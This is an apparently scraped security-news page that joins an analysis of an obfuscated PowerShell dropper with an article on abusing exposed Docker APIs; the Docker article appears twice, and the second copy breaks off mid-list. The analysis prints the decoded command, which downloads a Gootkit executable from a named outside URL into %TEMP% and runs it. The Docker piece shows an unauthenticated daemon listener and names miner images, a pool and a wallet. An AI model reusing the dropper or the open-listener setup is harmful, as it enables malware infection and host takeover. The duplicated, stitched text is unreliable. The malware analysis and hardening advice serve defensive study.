${“@}${/.}${/.}${@}+ ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${@} +${“@}${$./}${*~} + ${“@}${$./}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} + ${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} +${“@}${/.}${@}${/.}+ 
${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;} +${“@}${/.}${*~}${@}+ ${“@}${/.}${@}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${#~=}+ ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@} + ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${ *-}+${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=}+ ${“@}${)@}${;}+${“@}${/.}${@}${/.} +${“@}${/.}${*~}${@}+${“@}${/.}${@}${/.} + ${“@}${‘}${#~=}+ ${“@}${$./}${*~}+ ${“@}${“[+}${$./} + ${“@}${/.}${/.}${;}+${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} +${“@}${“[+}${@}+${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${/.}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${‘} +${“@}${$./}${*~} +${“@}${$./}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} +${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${@}${#~=} + ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+ ${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;}+${“@}${/.}${*~}${@}+${“@}${/.}${@}${;} +${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${ *-} +${“@}${/.}${@}${ *-} + ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${#~=}+${“@}${)@}${;} +${“@}${/.}${@}${/.} + ${“@}${/.}${*~}${@} + ${“@}${/.}${@}${/.} )”)

It looks like a meaningless sequence of special characters, yet the PowerShell interpreter executes it without complaint. A closer look reveals a pattern in the odd characters that follow the “$” symbol: PowerShell allows variables to be declared as ${variable_name} with any characters between the braces, special characters included. For instance, some of the variable names in the script above are:

  1. ${#/~}
  2. ${@}
  3. ${;}
  4. ${“@}
  5. ${#~=}
  6. ${/.}
  7. ${*~}

Replacing these variable names with some more readable and meaningful characters makes the script easier to analyze:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );
  2. .$var1 (“$var1 ($var12$var3$var2$var7 + $var12$var3$var2$var4 +$var12$var6$var2+ $var12$var5$var8+$var12$var3$var2$var6 +$var12$var3$var3$var3 +$var12$var3$var3$var7+ $var12$var3$var3$var8 +$var12$var6$var8+$var12$var3$var3$var10+$var12$var3$var2$var3+$var12$var3$var3$var6+$var12$var3$var3$var7+$var12$var3$var2$var7+$var12$var3$var3$var3+ $var12$var3$var3$var2+$var12$var6$var8+ $var12$var3$var2$var11 + $var12$var11$var9+ $var12$var3$var2$var8+ $var12$var3$var3$var3 +$var12$var3$var3$var6+ $var12$var5$var4+$var12$var6$var7+ $var12$var3$var2$var10 + $var12$var3$var3$var8+ $var12$var5$var4 +$var12$var7$var3 + $var12$var6$var3+ $var12$var3$var4$var5 + $var12$var9$var5+ $var12$var3$var2$var11+ $var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var3$var6+$var12$var3$var3$var8+ $var12$var6$var7+$var12$var9$var9+ $var12$var3$var3$var3+$var12$var3$var2$var2+ $var12$var3$var3$var9+$var12$var3$var2$var10 +$var12$var3$var2$var3+$var12$var5$var4 +$var12$var8$var8+$var12$var3$var2$var7+ $var12$var3$var3$var8+$var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6+ $var12$var11$var9 +$var12$var3$var3$var2+$var12$var3$var3$var7+ $var12$var3$var2$var4 + $var12$var3$var2$var3 +$var12$var3$var3$var6 + $var12$var3$var4$var7+$var12$var5$var4 +$var12$var10$var5 + $var12$var3$var3$var8 + $var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 + $var12$var8$var8 + $var12$var3$var2$var7+$var12$var3$var3$var8 + $var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6 +$var12$var11$var9 +$var12$var3$var3$var2+ $var12$var3$var3$var7+$var12$var3$var2$var4 +$var12$var3$var2$var3 + $var12$var3$var3$var6 + $var12$var5$var4+$var12$var6$var7+ $var12$var10$var5+ $var12$var3$var3$var3+ $var12$var3$var3$var9 + $var12$var3$var3$var6+ $var12$var11$var11+$var12$var3$var2$var3 + $var12$var5$var4+ $var12$var3$var2$var6+ $var12$var3$var3$var8+ $var12$var3$var3$var8 + $var12$var3$var3$var4 +$var12$var3$var3$var7+$var12$var7$var10+ 
$var12$var6$var9+$var12$var6$var9+$var12$var3$var3$var4 +$var12$var3$var3$var6 + $var12$var3$var2$var3 + $var12$var3$var2$var2 + $var12$var3$var2$var7+$var12$var3$var3$var7+ $var12$var3$var3$var4 +$var12$var3$var3$var3 + $var12$var3$var3$var7+ $var12$var3$var3$var8+ $var12$var3$var3$var3 + $var12$var6$var8+$var12$var3$var2$var11+ $var12$var11$var9+$var12$var3$var3$var8 +$var12$var3$var3$var8 +$var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var2$var2+$var12$var3$var3$var7+ $var12$var11$var11+ $var12$var3$var2$var6+ $var12$var3$var3$var11 + $var12$var3$var2$var3+ $var12$var3$var2$var7 +$var12$var3$var3$var8 + $var12$var6$var8+ $var12$var11$var11 + $var12$var3$var3$var3 + $var12$var3$var2$var11+ $var12$var6$var9 + $var12$var11$var11+ $var12$var3$var3$var3+$var12$var3$var2$var11 +$var12$var3$var3$var9+ $var12$var3$var3$var2+$var12$var3$var2$var7 + $var12$var3$var3$var10 + $var12$var6$var9+$var12$var3$var2$var7+ $var12$var3$var3$var2 + $var12$var3$var3$var8+$var12$var3$var2$var3+ $var12$var3$var3$var6+$var12$var6$var8 + $var12$var3$var3$var4+ $var12$var3$var2$var6 +$var12$var3$var3$var4 + $var12$var7$var7 +$var12$var5$var4+$var12$var6$var7+$var12$var8$var10+ $var12$var3$var2$var3 +$var12$var3$var3$var7 +$var12$var3$var3$var8+$var12$var3$var2$var7+ $var12$var3$var3$var2+ $var12$var11$var9+ $var12$var3$var3$var8+$var12$var3$var2$var7+$var12$var3$var3$var3 + $var12$var3$var3$var2 +$var12$var5$var4 + $var12$var5$var8 + $var12$var3$var2$var3 +$var12$var3$var3$var2+ $var12$var3$var3$var10 + $var12$var7$var10 + $var12$var3$var3$var8 +$var12$var3$var2$var3+ $var12$var3$var2$var11+ $var12$var3$var3$var4 + $var12$var11$var4+$var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8 +$var12$var3$var4$var2+ $var12$var3$var2$var8 +$var12$var3$var2$var3+$var12$var3$var3$var11+ $var12$var3$var3$var9+ $var12$var3$var2$var6 + $var12$var3$var3$var9+ $var12$var3$var2$var9+$var12$var3$var2$var3 +$var12$var3$var3$var11+ $var12$var6$var8+$var12$var3$var2$var3 
+$var12$var3$var4$var2+$var12$var3$var2$var3 + $var12$var7$var11+ $var12$var5$var4+ $var12$var10$var5 + $var12$var3$var3$var8+$var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 +$var12$var10$var2+$var12$var3$var3$var6 +$var12$var3$var3$var3+ $var12$var11$var11+ $var12$var3$var2$var3 + $var12$var3$var3$var7 +$var12$var3$var3$var7 +$var12$var5$var4 +$var12$var5$var8 +$var12$var3$var2$var3+$var12$var3$var3$var2+ $var12$var3$var3$var10 +$var12$var7$var10 + $var12$var3$var3$var8 + $var12$var3$var2$var3 +$var12$var3$var2$var11 + $var12$var3$var3$var4 + $var12$var11$var4+ $var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8+$var12$var3$var4$var2+$var12$var3$var2$var8 +$var12$var3$var2$var3 +$var12$var3$var3$var11 +$var12$var3$var3$var9+ $var12$var3$var2$var6+ $var12$var3$var3$var9 +$var12$var3$var2$var9 + $var12$var3$var2$var3 + $var12$var3$var3$var11+$var12$var6$var8 +$var12$var3$var2$var3 + $var12$var3$var4$var2 + $var12$var3$var2$var3 )”)

The first instruction of the script assigns fixed values to the variables, derived through a chain of counter increments and string-indexing operations:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );

After this instruction has executed, the variables hold the following values:

$var1 = "iex"
$var2 = "0"
$var3 = "1"
$var4 = "2"
$var5 = "3"
$var6 = "4"
$var7 = "5"
$var8 = "6"
$var9 = "7"
$var10 = "8"
$var11 = "9"
$var12 = "[CHar]"

The second piece of code concatenates the above values to compose a PowerShell command string. Each character of the generated command is represented as its ASCII decimal code, using the variables above as the alphabet (e.g. “$var12$var3$var2$var7” becomes “[CHar]105”). Decoding the entire instruction yields:

  1. iex ([CHar]105 + [CHar]102 +[CHar]40+ [CHar]36+[CHar]104 +[CHar]111 +[CHar]115+ [CHar]116 +[CHar]46+[CHar]118+[CHar]101+[CHar]114+[CHar]115+[CHar]105+[CHar]111+ [CHar]110+[CHar]46+ [CHar]109 + [CHar]97+ [CHar]106+ [CHar]111 +[CHar]114+ [CHar]32+[CHar]45+ [CHar]108 + [CHar]116+ [CHar]32 +[CHar]51 + [CHar]41+ [CHar]123 + [CHar]73+ [CHar]109+ [CHar]112+ [CHar]111 + [CHar]114+[CHar]116+ [CHar]45+[CHar]77+ [CHar]111+[CHar]100+ [CHar]117+[CHar]108 +[CHar]101+[CHar]32 +[CHar]66+[CHar]105+ [CHar]116+[CHar]115+[CHar]84 +[CHar]114+ [CHar]97 +[CHar]110+[CHar]115+ [CHar]102 + [CHar]101 +[CHar]114 + [CHar]125+[CHar]32 +[CHar]83 + [CHar]116 + [CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 + [CHar]66 + [CHar]105+[CHar]116 + [CHar]115+[CHar]84 +[CHar]114 +[CHar]97 +[CHar]110+ [CHar]115+[CHar]102 +[CHar]101 + [CHar]114 + [CHar]32+[CHar]45+ [CHar]83+ [CHar]111+ [CHar]117 + [CHar]114+ [CHar]99+[CHar]101 + [CHar]32+ [CHar]104+ [CHar]116+ [CHar]116 + [CHar]112 +[CHar]115+[CHar]58+ [CHar]47+[CHar]47+[CHar]112 +[CHar]114 + [CHar]101 + [CHar]100 + [CHar]105+[CHar]115+ [CHar]112 +[CHar]111 + [CHar]115+ [CHar]116+ [CHar]111 + [CHar]46+[CHar]109+ [CHar]97+[CHar]116 +[CHar]116 +[CHar]112+ [CHar]111 + [CHar]100+[CHar]115+ [CHar]99+ [CHar]104+ [CHar]119 + [CHar]101+ [CHar]105 +[CHar]116 + [CHar]46+ [CHar]99 + [CHar]111 + [CHar]109+ [CHar]47 + [CHar]99+ [CHar]111+[CHar]109 +[CHar]117+ [CHar]110+[CHar]105 + [CHar]118 + [CHar]47+[CHar]105+ [CHar]110 + [CHar]116+[CHar]101+ [CHar]114+[CHar]46 + [CHar]112+ [CHar]104 +[CHar]112 + [CHar]55 +[CHar]32+[CHar]45+[CHar]68+ [CHar]101 +[CHar]115 +[CHar]116+[CHar]105+ [CHar]110+ [CHar]97+ [CHar]116+[CHar]105+[CHar]111 + [CHar]110 +[CHar]32 + [CHar]36 + [CHar]101 +[CHar]110+ [CHar]118 + [CHar]58 + [CHar]116 +[CHar]101+ [CHar]109+ [CHar]112 + [CHar]92+[CHar]107+ [CHar]115 + [CHar]106 +[CHar]120+ [CHar]106 +[CHar]101+[CHar]119+ [CHar]117+ [CHar]104 + [CHar]117+ [CHar]107+[CHar]101 +[CHar]119+ [CHar]46+[CHar]101 +[CHar]120+[CHar]101 + [CHar]59+ [CHar]32+ [CHar]83 
+ [CHar]116+[CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 +[CHar]80+[CHar]114 +[CHar]111+ [CHar]99+ [CHar]101 + [CHar]115 +[CHar]115 +[CHar]32 +[CHar]36 +[CHar]101+[CHar]110+ [CHar]118 +[CHar]58 + [CHar]116 + [CHar]101 +[CHar]109 + [CHar]112 + [CHar]92+ [CHar]107+ [CHar]115 + [CHar]106+[CHar]120+[CHar]106 +[CHar]101 +[CHar]119 +[CHar]117+ [CHar]104+ [CHar]117 +[CHar]107 + [CHar]101 + [CHar]119+[CHar]46 +[CHar]101 + [CHar]120 + [CHar]101 )

At this point, a simple ASCII-to-character conversion recovers the final PowerShell command and reveals the purpose of the code. On PowerShell versions older than 3.0 it imports the BitsTransfer module (Background Intelligent Transfer Service); it then uses Start-BitsTransfer to download the Gootkit payload into the user’s %TEMP% folder and Start-Process to execute it.

if($host.version.major -lt 3){
Import-Module BitsTransfer
}
Start-BitsTransfer -Source https://predisposto.mattpodschweit.com/comuniv/inter.php7 -Destination $env:temp\ksjxjewuhukew.exe;
Start-Process $env:temp\ksjxjewuhukew.exe
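As an added example (not Yoroi’s code), here is a small Python deobfuscator for this scheme: it re-derives the twelve values by emulating the counter and the string-indexing tricks of the first block, renames the variables in a second-stage fragment and decodes the [CHar] concatenation. Assumptions: the strings that "$(@{})", "$?" and the "".inSert method object stringify to are the usual values on a Windows host ("System.Collections.Hashtable", "True" and the String.Insert overload signature), which is exactly what lets the script index into them; the sample fragment is the first nine tokens of the stage shown above, with the typographic quotes of the web rendering written as straight quotes.

```python
import re

# What the two PowerShell expressions the obfuscator indexes into evaluate
# to on an ordinary host (assumed here, not stated in the article): an empty
# hashtable stringifies to its type name, and $? is $true after a statement
# that succeeded.
HASHTABLE_STR = "System.Collections.Hashtable"
LAST_STATUS_STR = "True"
# String form of the PSMethod that "".inSert yields; the script indexes it to
# get the "x" of "iex" (assumed from the .NET String.Insert signature).
INSERT_METHOD_STR = "string Insert(int startIndex, string value)"

# The twelve variable names in the order the script assigns them.  The web
# rendering shows the quote characters as typographic quotes; straight quotes
# are used here.
VAR_NAMES = ['${#/~}', '${@}', '${/.}', '${*~}', '${$./}', '${)@}',
             "${'}", '${;}', '${ *-}', '${"[+}', '${#~=}', '${"@}']


def build_alphabet():
    """Emulate the first pipeline block and return {variable name: value}.

    var1 = +$() is $null coerced to 0; var2 copies it; var3 = ++var1 is 1;
    var4..var11 each do (var1 = var1 + var3), so var2..var11 are "0".."9".
    var12 and the final var1 are spelled out by indexing into strings.
    """
    values = {}
    counter = 0
    values[VAR_NAMES[1]] = str(counter)          # ${@}  -> "0"
    counter += 1
    values[VAR_NAMES[2]] = str(counter)          # ${/.} -> "1"
    for name in VAR_NAMES[3:11]:                 # ${*~} .. ${#~=} -> "2".."9"
        counter += 1
        values[name] = str(counter)
    h, q = HASHTABLE_STR, LAST_STATUS_STR
    # ${"@} = "[" + h[7] + h[19] + h[20] + q[1] + "]"      -> "[CHar]"
    values[VAR_NAMES[11]] = "[" + h[7] + h[19] + h[20] + q[1] + "]"
    # ${#/~} = "".(h[14]+h[16]+h[0]+h[4]+q[1]+h[3])        -> the PSMethod "".inSert
    # ${#/~} = h[14] + h[4] + "$(that method)"[27]          -> "iex"
    method = h[14] + h[16] + h[0] + h[4] + q[1] + h[3]
    assert method.lower() == "insert", method
    values[VAR_NAMES[0]] = h[14] + h[4] + INSERT_METHOD_STR[27]
    return values


def rename(text, alphabet):
    """Replace every ${...} variable with its value, longest names first so a
    name that is a prefix of another cannot match too early."""
    for name in sorted(alphabet, key=len, reverse=True):
        text = text.replace(name, alphabet[name])
    return text


CHAR_RE = re.compile(r"\[CHar\]\s*(\d+)", re.IGNORECASE)


def decode_char_concat(text):
    """Collapse '[CHar]105 + [CHar]102 + ...' into the string it spells."""
    return "".join(chr(int(n)) for n in CHAR_RE.findall(text))


def deobfuscate(second_stage):
    """Full pipeline: variable rename, then decimal-to-character decoding."""
    return decode_char_concat(rename(second_stage, build_alphabet()))


# Constructed sample: the first nine tokens of the second stage, which spell
# the opening of the final command.
SAMPLE = ('${"@}${/.}${@}${\'} + ${"@}${/.}${@}${*~} +${"@}${)@}${@}+ '
          '${"@}${$./}${;}+${"@}${/.}${@}${)@} +${"@}${/.}${/.}${/.} +'
          '${"@}${/.}${/.}${\'}+ ${"@}${/.}${/.}${;} +${"@}${)@}${;}')


if __name__ == "__main__":
    for name, value in build_alphabet().items():
        print(f"{name:8} = {value}")
    print(deobfuscate(SAMPLE))
```

Run as-is it prints the alphabet and decodes the sample to if($host. ; feeding it the full second stage recovers the whole BitsTransfer command. The decoder works because the script never calls a decoding routine of its own: every value is reconstructed from environment strings whose contents are stable, so an analyst can simply replay the same indexing.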

Conclusion

At first glance the initial script seems obfuscated with sophisticated techniques. Analyzing the actual code, however, shows how the clever use of simple tricks, such as variable renaming and decimal character encoding, is enough to hide a plainly malicious PowerShell script and make it very hard for common anti-malware engines to detect.

This analysis and many others are available on the official blog of the Yoroi cyber security firm.

Dissecting the Mindscrew-Powershell Obfuscation

Pierluigi Paganini

(Security Affairs – Powershell , VBScript)

The post Dissecting the Mindscrew-Powershell Obfuscation appeared first on Security Affairs.

Security Affairs: Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers

Exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community.

Preface

The IT industry has seen quite a few transformations in the last couple of decades, each driven by a disruptive technology. Back in 2000 every aspiring student wanted to become a computer or IT engineer, thanks to the “.com” boom that was sweeping the industry. A few years later the industry was disrupted again by the arrival of virtualization.

The inception of cloud technologies in the last few years has completely changed the way we perceive and manage IT. Who would have thought 20 years ago that an entire IT infrastructure could be generated from a few lines of code?

More recently, the rise of DevOps, built on these advances, is once again redefining the way the industry works. Every organization is keen to embrace this digital transformation and reap the benefits of DevOps. DevOps practices make it possible to deliver products rapidly by reshaping and automating the CI/CD pipeline, and they make deployment more efficient and standardized by providing speed, consistency and scalability. IT is going through another big transformation and we are all part of this journey. At the same time the cyber security industry is moving quickly to keep pace: the ways and means of delivering effective security have changed radically in the last 6-7 years to cope with this dynamic environment, and the rise of DevOps has given birth to DevSecOps to secure the CI/CD pipeline.

The use of containers has become prevalent with the rise of DevOps. Containers are dynamic and ephemeral by nature; anything ephemeral is hard to get visibility on, and what is not visible is hard to secure. Traditional security measures may or may not work effectively for such a dynamic infrastructure. Container security brings several challenges, and there are commercial and open-source solutions on the market to handle them.

In this article I explore the abuse of the open API of Docker containers. Docker is a popular container product that has been widely adopted by the community, and it is available in community and enterprise editions. Docker ships with quite a few security features, but misconfiguration by the admins or users of a Docker host can leave it vulnerable and open to exploitation.

Need of an API

By default, when Docker is installed, the daemon’s API is not exposed to the network: it listens only on the local Unix socket (/var/run/docker.sock) on the host. Exposing the API over TCP may be required for tools such as Portainer, which is used to manage containers on that host or on remote hosts.

How to open API in Docker for CentOS?

Opening the API can be slightly tricky depending on the operating system you are using. Follow these steps to open the API on CentOS 7, assuming the Docker engine is already installed.

Create or update the systemd drop-in file /etc/systemd/system/docker.service.d/docker.conf with the following content (the empty ExecStart= line clears the unit’s original command before the new one is set):

[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

Note that this listener has no authentication and no encryption: anyone who can reach TCP port 2375 can drive the daemon, which is equivalent to root on the host. Docker’s documented alternative is a TLS-protected listener, conventionally on port 2376, started with --tlsverify and a CA that signs the client certificates.

Note: If directory or file is missing under /etc/systemd/system then create it manually.

Docker

Restart the docker service using systemd commands:

sudo systemctl daemon-reload
sudo systemctl restart docker

You can verify if the configuration is working as expected by calling

Ps –ef | grep docker

Docker

How to connect to open API?

Following Docker command is used to hook in to open API on the remote host. Just by nudging the API with a standard curl command you will get following information (see the screenshot).

Curl –s <remote_ip>:2375/2376 | jq

Docker

What can(not) we do with Open API?

Once we get the open API on a remote docker_host, all the docker commands can be run on the remote hosts.  Using Docker commands, all sorts of docker operations & management can be performed on the remote host for Dockers –  ranging from Information gathering about Docker host to pulling the cryptominer image and running it as a rogue container on the remote host.

I have created a demo set-up to demonstrate a few of these examples

I have expose API on one of the CentOS boxes –  10.113.12.119 – as per the steps mentioned in the above section. I will connect to this machine using this Open API on port 2375 (Docker).

Information Gathering

Docker

List the images stored on the machine

Docker

List all containers on the machineDocker

Run/Launch the container on the remote machine / Spwaning a shell via exec command

Docker

List running containers on the machine

Docker

Run any command with root privilege on any of the running containers

Docker

Pull any image from the public repository and run that as a container on the remote hostDocker

Docker

Open Docker API on the Internet

If you explore Shodan search engine for Open API then you find that more than 1000 hosts are having their Docker API exposed on the Internet.

Docker

I have pulled down sample approx. 500 hosts using Shodan API and done some analytics on these 500 hosts to know the spread pattern of these open APIs.

Docker

By looking at the chart above, we can say that, China & United States shares the large number of open Docker APIs.

The largest share of the Docker Engines in analyzed ~500 open APIs are: 18.06.1-ce.

Docker

Even if where SSL/TLS is enabled, a small portion of Docker APIs were supporting vulnerable and outdated

protocols like SSLv2, SSLv3

Are they already compromised?

Out of ~500 samples analyzed, 130+ are already compromised with the cryptominer. It has been observed that 130+ hosts are compromised and running with cryptominer containers at the time of this research.  A few of the hosts are running with multiple mining containers; moreover, the containers are dynamic in nature hence the data varies a bit everytime we scan the open APIs. However, it is consistently giving 140+ miner containers running during the scan of these ~500 vulnerable hosts.

Most of these hosts are compromised with popular monero cpu cryptominer. These rogue containers will eat up CPU cycles on the hosts where it is installed. Docker has made it too easy to start mining with the help of miner images uploaded on the Docker Image Repository – Hub.

Just need to pull down one of those images and run/start the container on the remote hosts.

Out of ~140 observed compromised hosts, ~110+ are running with the “kannix/monero-miner” image.

Docker

If you look at the image statistics on Docker image repository, this image is pulled over 10M times. This shows the popularity of this miner image.

There are other cryptominer images also used but in very small portion.

arayan/monero-miner

Docker

timonmat/xmr-stak-cpu

Docker

strm/xmrig

Docker

bitnn/alpine-xmrig

Docker

Kannix/monero-miner run with following arguments for all analyzed samples –

  • Algorithm – cryptonight-lite
  • Pool Used – pool.aeon.hashvault.pro:3333
  • User (wallet account) –WmthxKa4FVvSDA8fjyXiZJB3WWWFxumQJAZfRGmrMCaMCooq52sipimAYJM2NYNy34bJUX566wEBmEC2QmdmnVLh2GzgRy4F6
  • Password – phantompain
  • Donate-level – 1
  • Max-cpu-usage – 100

How to prevent such attacks?

To prevent such attacks, we need to secure DockerAPI, TLS needs to be enabled by specifying tlsverify flag and pointing dokcer’s tlscacert to a trusted CA certificate.

There is step-by-step process explained how to secure API is described in Security documentation. Please refer Protect the Docker daemon socket.

About the author: Kirtar Oza CISSP,CISA, MS

Edited by Pierluigi Paganini

(Security Affairs – cybersecurity, Hacking)

The post Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers appeared first on Security Affairs.



Security Affairs

Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers

Exploring the open API abuse for Docker Containers. Docker is a popular container product which has been adopted widely by the community.

Preface

The IT industry has seen quite a few transformations in the last couple of decades with the advent of disruptive technologies. Back in 2000, every aspiring student wanted to become a computer/IT engineer, thanks to the “.com” boom that was storming the IT industry in those days. A few years later, the IT industry was disrupted again, big time, with the dawn of virtualization.

The inception of cloud technologies in the last few years has completely changed the way we perceive and manage IT. Who would have thought 20 years ago that an entire IT infrastructure could be generated by just a few lines of code?

Recently, with the rise of DevOps, backed by these latest disruptive advancements, the IT industry is once again redefining the way it works. Today, every organization in the industry is keen to embrace this digital transformation journey and adopt DevOps to leverage the benefits it provides. DevOps practices offer an enormous capability for rapidly delivering products by reforming and automating the CI/CD pipeline. They make deployment far more efficient and standardized by providing speed, consistency and scalability. The field of IT is again going through a big transformation and we are all a part of this journey. At the same time, the cyber security industry is also moving very quickly to keep pace with these technology disruptions. The ways and means of delivering effective cyber security have gone through radical changes in the last 6-7 years to ensure security in this dynamic environment. Meanwhile, the rise of DevOps has given birth to DevSecOps to ensure security in the CI/CD pipeline.

The use of containers has become prevalent with the rise of the DevOps era. Containers are dynamic and ephemeral by nature. Anything ephemeral is hard to get visibility on, and if it is not visible then it is hard to secure. Traditional security measures may or may not work effectively to secure such a dynamic infrastructure. There are several challenges related to container security, and there are commercial and open-source solutions on the market to handle these newborn challenges.

In this article, I am exploring open API abuse for Docker containers. Docker is a popular container product which has been adopted widely by the community. Docker has both community and enterprise editions. Docker comes with quite a few security features; however, misconfiguration by Docker admins/users may leave hosts vulnerable and open to exploitation.

Need for an API

By default, when Docker is installed, the API is not exposed to the outside world. It is only accessible locally, through the loopback interface of the container host. Exposing the API may be required to leverage applications like Portainer, which is used to manage containers on that host or on remote hosts.

How to open API in Docker for CentOS?

Opening the API may get slightly tricky depending on the operating system you are using. Follow these steps to open the API on CentOS 7, provided that the Docker engine is already installed.

Update the file /etc/systemd/system/docker.service.d/docker.conf with the following content (the first, empty ExecStart= clears the ExecStart inherited from the packaged unit, which systemd requires before a new one can be set; the tcp://0.0.0.0:2375 listener binds the unencrypted API on every interface, which is exactly the exposure examined in the rest of this article):

[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

Note: If the directory or file is missing under /etc/systemd/system, create it manually.

Restart the docker service using systemd commands:

sudo systemctl daemon-reload
sudo systemctl restart docker

You can verify that the configuration took effect by running

ps -ef | grep docker

and checking that the dockerd command line now carries the -H tcp://0.0.0.0:2375 argument.

How to connect to open API?

The following command hooks into the open API on the remote host. Just by nudging the API with a standard curl command you get a JSON response back, which confirms that the daemon is listening (jq pretty-prints it):

curl -s <remote_ip>:2375 | jq

Port 2376 is the conventional port where TLS is enabled.

What can(not) we do with Open API?

Once we reach the open API on a remote docker_host, all docker commands can be run against that remote host. Using Docker commands, all sorts of Docker operations and management can be performed on the remote host, ranging from information gathering about the Docker host to pulling a cryptominer image and running it as a rogue container on the remote host.

I have created a demo set-up to demonstrate a few of these examples.

I have exposed the API on one of the CentOS boxes – 10.113.12.119 – following the steps mentioned in the section above. I will connect to this machine through this open API on port 2375 (Docker).

Information Gathering

List the images stored on the machine

List all containers on the machine

Run/launch a container on the remote machine / spawn a shell via the exec command

List running containers on the machine

Run any command with root privilege in any of the running containers

Pull any image from the public repository and run it as a container on the remote host

Open Docker API on the Internet

If you search the Shodan search engine for open Docker APIs, you find that more than 1000 hosts have their Docker API exposed on the Internet.

I have pulled down a sample of approx. 500 hosts using the Shodan API and done some analytics on these 500 hosts to understand the spread pattern of these open APIs.

[Chart: open Docker APIs in the ~500-host sample, by country]

Looking at the chart above, we can say that China and the United States account for the largest number of open Docker APIs.

The most common Docker Engine version among the ~500 analyzed open APIs is 18.06.1-ce.

Even where SSL/TLS is enabled, a small portion of the Docker APIs still supported vulnerable and outdated protocols like SSLv2 and SSLv3.

Are they already compromised?

Out of the ~500 samples analyzed, 130+ hosts were already compromised with a cryptominer: 130+ hosts were observed running cryptominer containers at the time of this research. A few of the hosts run multiple mining containers; moreover, since containers are dynamic in nature, the figures vary a bit every time the open APIs are scanned. However, every scan of these ~500 vulnerable hosts consistently shows 140+ miner containers running.

Most of these hosts are compromised with a popular Monero CPU cryptominer. These rogue containers eat up CPU cycles on the hosts where they run. Docker has made it far too easy to start mining, thanks to the miner images uploaded to the Docker image repository, Docker Hub.

One only needs to pull down one of those images and run/start the container on the remote host.

Out of the ~140 observed compromised hosts, ~110+ are running the “kannix/monero-miner” image.

If you look at the image statistics on Docker image repository, this image is pulled over 10M times. This shows the popularity of this miner image.

There are other cryptominer images in use too, but in a much smaller proportion:

  • arayan/monero-miner
